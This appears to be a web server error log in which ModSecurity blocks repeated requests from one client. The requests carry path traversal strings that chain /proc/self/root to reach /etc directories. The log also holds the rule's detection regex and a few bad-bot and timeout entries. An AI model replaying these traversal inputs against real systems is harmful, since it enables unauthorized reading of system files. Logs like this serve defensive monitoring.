[Wed Mar 18 20:57:54.029433 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:43772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8AgSuyh5UNeevTVfpYQAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:57:55.302192 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.241.31:41808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8AymAPhZkrhU8w4mtrgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:57:56.453227 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:41822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8BOyqAr6etmhZHNoMLQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:57:57.758717 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:37732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8BQbLMZ6AikZjR9UDkAAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:01.350101 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:37744] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8CQSuyh5UNeevTVfpZQAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:02.772601 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:37746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8CgSuyh5UNeevTVfpZgAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:04.091120 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:37756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8DASuyh5UNeevTVfpZwAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:05.359626 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:37766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8DQSuyh5UNeevTVfpaAAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:06.629334 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.241.31:37782] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8Dsdf6f5d65gmYZQZGAAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:07.909949 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:52290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8DwbLMZ6AikZjR9UDlAAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:12.443156 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:52306] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8FAbLMZ6AikZjR9UDmAAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:14.391835 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:52316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8FgSuyh5UNeevTVfpawAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:16.061809 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34330] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:58:16.724148 2026] [:error] [pid 9530:tid 140411590858496] [client 74.7.241.31:52324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8GASuyh5UNeevTVfpbQAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:19.622573 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:52076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8GwkwaGbbGflqUZBX-gAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:27.722699 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:52080] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8IwkwaGbbGflqUZBX_AAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:37.337962 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34754] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:58:55.886381 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:58278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8P8df6f5d65gmYZQZGgAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:58:56.949544 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.228.61:33854] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs8QMdf6f5d65gmYZQZHAAAAtM"]
[Wed Mar 18 20:58:57.855398 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.241.31:53844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8QUzinOy1jxa1j4dizgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:01.220735 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35072] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 20:59:02.652144 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:53850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8RgkwaGbbGflqUZBYBAAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:06.307788 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:36684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8SgkwaGbbGflqUZBYCAAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:16.011581 2026] [:error] [pid 27293:tid 140411666392832] [client 74.7.241.31:37726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8VP-YZRR_7pZ7nDI2lwAAA8k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 20:59:20.309065 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.241.31:52062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs8WCmAPhZkrhU8w4mt3wAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
